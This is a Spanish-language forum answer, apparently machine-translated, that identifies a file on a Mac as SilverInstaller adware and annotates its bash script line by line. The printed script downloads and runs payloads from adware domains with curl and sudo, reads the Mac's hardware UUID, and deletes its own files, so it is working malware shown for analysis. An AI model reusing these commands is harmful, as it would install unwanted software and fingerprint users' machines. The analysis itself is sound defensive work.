¿Qué es este ejecutable desconocido en mi volumen de arranque? ¿Es malicioso?

Este es SilverInstaller, adware para descargar más de adware y"programas potencialmente no deseados'. Esto probablemente se distribuye a través de falsos Flash pop-ups, que alguien en el sistema se hace clic en descargar, abrir, instalado y proporcionado el administrador de credenciales.

El software instalado en este paquete probablemente incluye

MacKeeper, VSearch, Un Pirrit inyector, BrowserEnhancer, MPlayer

todo lo cual, por supuesto, no quiere.

• https://www.intego.com/mac-security-blog/silverinstaller-uses-new-techniques-to-install-puapup/
• https://www.intego.com/mac-security-blog/silverinstaller-sneakier-than-previously-thought/

Voy a romper el código

#!/bin/bash

Este código de secuencia de comandos para ser interpretado por bash, señaló este proceso.

func_4(){

Comenzar una declaración de función, incluyendo el cuerpo para ser llamado más tarde.

/bin/mkdir -p /var/tmp

Asegúrese de que el directorio tmp existe para ser utilizado para el almacenamiento temporal de las cargas útiles maliciosas más tarde.

/usr/bin/curl -s -L -o /var/tmp/sr.tgz "http://c.premiummac.com/static/sr/sr_v2.tgz"
/usr/bin/tar -xzf /var/tmp/sr.tgz -C /var/tmp
cd /var/tmp/dvs

Descargar y extraer la primera carga maliciosa. sr_v2.tgz es BrowserEnhancer. La carga útil contiene un dvs directorio.

mid=$(ioreg -rd1 -c IOPlatformExpertDevice | awk '/IOPlatformUUID/ { split($0, line, "\""); printf("%s\n", line[4]); }')

Obtener un identificador único para esta máquina se puede usar más tarde.

COUNTRY="CA"
if [ "$COUNTRY" == "AU" ] || [ "$COUNTRY" == "CA" ] || [ "$COUNTRY" == "US" ] || [ "$COUNTRY" == "NZ" ]\
  || [ "$COUNTRY" == "ES" ] || [ "$COUNTRY" == "IT" ] || [ "$COUNTRY" == "NL" ] || [ "$COUNTRY" == "FR" ] || [ "$COUNTRY" == "IN" ]\
  || [ "$COUNTRY" == "DE" ]; then

Pruebe algunos región correspondiente a decidir qué hacer a continuación. Digo "intentar" porque esta no funciona cuando la región está codificada en la secuencia de comandos.

    sudo ./setup.sh "http://www.searchitdown.com/?n=026&searchsource=55&UM=8&gd=SY1000653" "http://www.searchitdown.com/?n=026&searchsource=69&UM=8&gd=SY1000653" "http://www.searchitdown.com/Results.aspx?n=026&searchsource=58&UM=8&gd=SY1000653" "searchitdown" "upd" "http://i.firstinstallmac.club/c/cc?id="

Llamada a un script externo con algo más de fantasía adware dominios.

else
    sudo ./setup.sh "http://feed.snowbitt.com/?publisher=TingSyn&ts=sy&barcodeid=51222999&searchtype=hp&type=YHS_TGE_2712c1&_=tt1" "http://feed.snowbitt.com/?publisher=TingSyn&ts=sy&barcodeid=51222999&searchtype=nt&type=YHS_TGE_2712c1&_=tt1" "http://feed.snowbitt.com/?publisher=TingSyn&ts=sy&barcodeid=51222999&searchtype=ds&type=TGE_2712c1" "snowbitt" "upd" "http://i.firstinstallmac.club/c/cc?id="
fi

Este bit nunca se ejecuta como se ha mencionado.

CLIENT_COMP=""
if [[ ! -z "$CLIENT_COMP" ]]; then
    /usr/bin/curl -s -L -o /var/tmp/re.txt "http://i.firstinstallmac.club/is/if?i="
fi

Agarrar otra carga.

func_taaVqst(){
sleep 220
rm -rf /var/tmp/dvs
rm -rf /var/tmp/sr.tgz
}
func_taaVqst &

Limpiar, quitar los archivos creados y caído antes en la secuencia de comandos, después de un retraso dado que los archivos han sido utilizadas por entonces.

}
func_4 &

La función de todo listo para ir, tiempo para llamar.

El script que hace todo lo que yo esperaría de malware a hacer y ha estado alrededor por un tiempo, así los dominios que se conecta podría ser bloqueadas o cerradas ahora.

• Descarga de algunos archivos, ejecuta los archivos y limpia después de sí mismo.

Podría ser ad(vertising)ware en lugar de malware, pero es claramente huellas de tu mac, la presentación de informes de un identificador único para tu Mac y con la intención de cambiar el estado de la Mac. A menos que usted participa en la herramienta y quería que se ejecute, (e incluso si lo hizo una vez) descargar y ejecutar el MalwareBytes limpiador sería mi próximo paso

• https://www.malwarebytes.com/